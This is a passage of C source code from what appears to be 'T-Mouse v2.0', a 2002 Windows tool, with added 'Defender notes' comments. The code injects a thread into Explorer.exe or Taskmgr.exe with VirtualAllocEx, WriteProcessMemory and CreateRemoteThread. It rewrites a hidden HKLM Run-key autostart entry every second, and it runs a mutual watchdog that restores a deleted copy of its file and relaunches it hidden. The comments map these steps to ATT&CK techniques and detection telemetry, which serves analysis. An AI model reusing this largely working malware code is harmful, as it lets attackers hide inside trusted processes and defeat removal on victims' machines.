if(EnumProcessModules(hprocess,&hmodule,sizeof(hmodule),&cbneeded))
{
GetModuleBaseName(hprocess,hmodule,normalname,sizeof(normalname));
if(!_tcsicmp(normalname,processname))
{
CloseHandle(hprocess);
return (lpidprocesses);
}
}
}
}
/* Handles of non-matching processes are not closed inside the loop; only the
   last value of hprocess is closed here. */
CloseHandle(hprocess);
return 0;
}
/*
 * Starts remote() as a thread inside another process.
 *
 * ctname and ckname are the two file paths that end up in the parameter block
 * (rptname / rpkname). The function returns the remote thread's handle, or
 * NULL when process enumeration, a remote allocation, a remote write or
 * CreateRemoteThread fails.
 *
 * Steps shown below: pick a target by name, open it with thread-creation and
 * memory-write rights, allocate executable memory in it, copy the bytes found
 * at remote()'s address, copy a filled-in REMOTEPARAMETER, then create the
 * thread.
 *
 * Defender notes: this is the VirtualAllocEx / WriteProcessMemory /
 * CreateRemoteThread injection sequence (ATT&CK T1055). Typical telemetry is
 * a cross-process open requesting PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION
 * | PROCESS_VM_WRITE (Sysmon event 10), a PAGE_EXECUTE_READWRITE region that
 * is not backed by any module, and a thread whose start address lies in that
 * region (Sysmon event 8).
 */
HANDLE createremote(PTSTR ctname,PTSTR ckname)
{
HANDLE ethread;
HANDLE rphandle;
TCHAR name[2][15];
TCHAR *remotethr;
TCHAR *remotepar;
DWORD remotepid;
int cb;
int signal;
HINSTANCE hkernel32;
REMOTEPARAMETER rp;
_tcscpy(name[0],_T("Explorer.exe"));
_tcscpy(name[1],_T("Taskmgr.exe"));
/* signal is pre-incremented before use, so the first lookup uses name[0] and
   the two names then alternate on every retry. */
signal=1;
while(1)
{
remotepid=processtopid(name[(++signal)%2]);
if(remotepid==-1)
{
return NULL;
}
else
if(remotepid==0)
{
if(signal%2==0)
{
OutputDebugString(_T("Remote Process Explorer isn't running/n"));
}
else
{
OutputDebugString(_T("Remote Process Taskmgr isn't running/n"));
}
Sleep(1000);
continue;
}
rphandle=OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_VM_OPERATION |
PROCESS_VM_WRITE,
FALSE,remotepid);
if(rphandle==NULL)
{
Sleep(1000);
continue;
}
else
{
break;
}
}
/* Fixed-size region (4096 TCHARs) for the thread code; the size is a constant,
   not the measured length of remote(). */
cb=sizeof(TCHAR)*4*1024;
remotethr=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
if(remotethr==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
/* Copies cb bytes starting at the address of remote() in this process. */
if(WriteProcessMemory(rphandle,remotethr,(LPVOID)remote,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Thread Error/n"));
CloseHandle(rphandle);
return NULL;
}
{
/* Fill the parameter block: caller's PID, message strings, both paths, an
   ANSI copy of ctname, and the kernel32 function addresses. */
memset(&rp,0,sizeof(rp));
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process/n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
_tcscpy(rp.rpweerror,_T("WinExec Error/n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
WideCharToMultiByte(CP_ACP,0,ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
/* Addresses are resolved in this process; the code assumes they are also
   valid inside the target. */
hkernel32=GetModuleHandle(_T("kernel32.dll"));
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileW");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileW");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
/* Size used for both the remote allocation and the write: sizeof(rp)
   multiplied by sizeof(TCHAR). */
cb=sizeof(TCHAR)*sizeof(rp);
remotepar=(PTSTR)VirtualAllocEx(rphandle,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
if(remotepar==NULL)
{
OutputDebugString(_T("VirtualAllocEx for Parameter Error/n"));
CloseHandle(rphandle);
return NULL;
}
if(WriteProcessMemory(rphandle,remotepar,(LPVOID)&rp,cb,NULL)==FALSE)
{
OutputDebugString(_T("WriteProcessMemory for Parameter Error:"));
CloseHandle(rphandle);
return NULL;
}
/* Thread entry is the copied code; its argument is the copied parameter block. */
ethread=CreateRemoteThread(rphandle,NULL,0,(LPTHREAD_START_ROUTINE)remotethr,(LPVOID)remotepar,0,NULL);
if(ethread==NULL)
{
OutputDebugString(_T("CreateRemoteThread Error/n"));
CloseHandle(rphandle);
return NULL;
}
/* rphandle is not closed on this path; only the thread handle is returned. */
return ethread;
}
void start()
{
_tprintf(_T("---[ T-Mouse v2.0, by TOo2y ]---/n"));
_tprintf(_T("---[ E-mail: TOo2y@safechina.net ]---/n"));
_tprintf(_T("---[ HomePage: www.safechina.net ]---/n"));
_tprintf(_T("---[ Date: 11-27-2002 ]---/n/n"));
return;
}
/*
 * Watchdog thread started by main(). pvparam is the handle of the thread
 * created by createremote().
 *
 * Once per second it (a) queries the value "T-Mouse" under the HKLM key named
 * by rgspath and, if the query fails, writes that value with wtname as data,
 * and (b) checks whether the remote thread has exited and, if so, calls
 * createremote() again. Returns (DWORD)-1 if the system directory cannot be
 * read, otherwise 0 after a registry call fails and ends the loop.
 *
 * Defender notes: this is autostart persistence through a Run key (ATT&CK
 * T1547.001) that is re-created within about a second of being deleted, so
 * removing the value while the process is alive has no lasting effect. The
 * value name "T-Mouse" and the repeated registry write (Sysmon event 13) are
 * the indicators visible here.
 * NOTE(review): rgspath is shown with "//" separators; this looks like the
 * forum's rendering of backslashes - confirm against the original.
 */
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
LPCTSTR rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD type=REG_SZ;
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
OutputDebugString(_T("GetSystemDirectory in watch Error/n"));
return -1;
}
/* Same two paths that main() builds: system directory + name1 / name2. */
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_QUERY_VALUE Error/n"));
break;
}
/* dwbuflen is an in/out byte count for this call and is reused below. */
ret=RegQueryValueEx(hkey,_T("T-Mouse"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
/* Any query failure is treated as "value missing" and triggers a rewrite. */
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegOpenKeyEx for KEY_WRITE Error/n"));
break;
}
/* Data is wtname; the byte count passed is whatever dwbuflen holds after
   the query above. */
ret=RegSetValueEx(hkey,_T("T-Mouse"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
OutputDebugString(_T("RegSetValueEx Error/n"));
break;
}
}
/* Re-inject when the remote thread is no longer running; the result of
   GetExitCodeThread itself is not checked. */
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=createremote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
/*
 * Thread routine whose bytes createremote() copies into another process.
 * pvparam points to the REMOTEPARAMETER block copied alongside it.
 *
 * The routine calls no function by name and uses no string literal: every API
 * is reached through an address stored in the block and every message is a
 * buffer in the block.
 *
 * Behaviour shown below: open the originating process (rpmousepid), block
 * until that process ends, check that rptname exists (copying rpkname to it
 * if FindFirstFile fails), then launch rpwinexecname with WinExec. Returns 0
 * on success and (DWORD)-1 after any failed step.
 *
 * Defender notes: this is the second half of a mutual watchdog - terminating
 * only the original process causes the host process to start it again, so
 * remediation has to deal with the injected thread (or its host process) and
 * both on-disk copies, not just the visible process. A process launch whose
 * parent is the injected host is the telemetry this step produces.
 */
DWORD WINAPI remote(LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
/* Function-pointer types matching the kernel32 exports resolved in createremote(). */
typedef VOID (WINAPI *EOutputDebugString)(LPCTSTR);
typedef HANDLE (WINAPI *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (WINAPI *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (WINAPI *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (WINAPI *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (WINAPI *EFindClose)(HANDLE);
typedef UINT (WINAPI *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
/* Load the call targets from the parameter block. */
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
tOutputDebugString(erp->rpstring);
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
tOutputDebugString(erp->rpoperror);
return -1;
}
/* Blocks here until the originating process terminates. */
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
erp->rpfilehandle=tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
tOutputDebugString(erp->rpffferror);
/* Restore the first file from the second copy; TRUE = do not overwrite. */
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
tOutputDebugString(erp->rpcferror);
return -1;
}
}
if(!tFindClose(erp->rpfilehandle))
{
tOutputDebugString(erp->rpfcerror);
return -1;
}
/* WinExec reports failure with a value of 31 or less; show-command 0 is SW_HIDE. */
if(tWinExec(erp->rpwinexecname, 0)<=31)
{
tOutputDebugString(erp->rpweerror);
return -1;
}
return 0;
}